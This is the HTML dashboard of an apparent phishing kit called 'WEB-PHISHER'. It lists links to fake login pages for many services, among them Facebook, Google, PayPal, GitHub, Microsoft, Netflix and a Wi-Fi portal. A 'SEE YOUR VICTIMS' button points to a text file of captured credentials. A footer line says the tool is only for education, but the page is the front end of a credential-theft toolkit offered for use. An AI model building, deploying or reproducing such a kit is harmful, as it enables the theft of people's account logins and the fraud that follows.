<!doctype html>
<!--
	Solution by GetTemplates.co
	URL: https://gettemplates.co
-->
<html lang="en">
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- awesone fonts css-->
    <link href="css/font-awesome.css" rel="stylesheet" type="text/css">
    <!-- owl carousel css-->
    <link rel="stylesheet" href="owl-carousel/assets/owl.carousel.min.css" type="text/css">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <!-- custom CSS -->
    <link rel="stylesheet" href="css/style.css">
    <title>WEB-PHISHER The advanced web phishing tool</title>
    <style>
    </style>
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-light bg-light bg-transparent" id="gtco-main-nav">
    <div class="container"><a class="navbar-brand">WEB-PHISHER</a>
        <button class="navbar-toggler" data-target="#my-nav" onclick="myFunction(this)" data-toggle="collapse"><span
                class="bar1"></span> <span class="bar2"></span> <span class="bar3"></span></button>
        <div id="my-nav" class="collapse navbar-collapse">

        </div>
    </div>
</nav>
<footer class="container-fluid" id="gtco-footer">
    <div class="container">
        <div class="row">
            <div class="col-lg-6" id="contact">
                <h4>THE ADVANCED WEB PHISHING TOOL</h4>
                <a href="facebook/mydata.txt" class="submit-button">SEE YOUR VICTIMS <i class="fa fa-angle-right" aria-hidden="true"></i></a>
            </div>
            <div class="col-lg-6">
                <div class="row">
                    <div class="col-6">
                        <h4>PHISHING PAGES</h4>
                        <ul class="nav flex-column company-nav">
                            <li class="nav-item"><a class="nav-link" href="facebook/login.html">Facebook</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="google/login.html">Google</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="instagram/login.html">Instagram</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="freefire/login.html">Free Fire</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="paypal/login.html">Paypal</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="github/login.html">Github</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="protonmail/login.html">Protonmail</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="netflix/login.html">Netflix</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="snapchat/login.html">Snapchat</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="mediafire/login.html">Mediafire</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">.</a></li>
                            
                            
                        </ul>
                    </div>
                    <div class="col-6">
                        <h4>PHISHING PAGES</h4>
                        <ul class="nav flex-column services-nav">
                            <li class="nav-item"><a class="nav-link" href="instafreefallowers/login.html">Insta fallowers</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="linkedin/login.html">Linkedin</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="Wi-Fi/login.html">Wi-Fi</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="twitter/login.html">Twitter</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="wordpress/login.html">Wordpress</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="pubg/login.html">Pubg</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="pinterest/login.html">Pinterest</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="spotify/login.html">Spotify</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="yahoo/login.html">Yahoo</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="microsoft/login.html">Microsoft</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">-------------</a></li>
                            <li class="nav-item"><a class="nav-link" href="#">.</a></li>
                            
                        </ul>
                    </div
                    <div class="col-12">
                        <p>This tool only for education purpose <br> <br> &copy;Design & developed by <a href="#" target="_blank">Manickavasagam</a>.</p>
                    </div>
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="js/jquery-3.3.1.slim.min.js"></script>
<script src="js/popper.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<!-- owl carousel js-->
<script src="owl-carousel/owl.carousel.min.js"></script>
<script src="js/main.js"></script>
</body>
</html>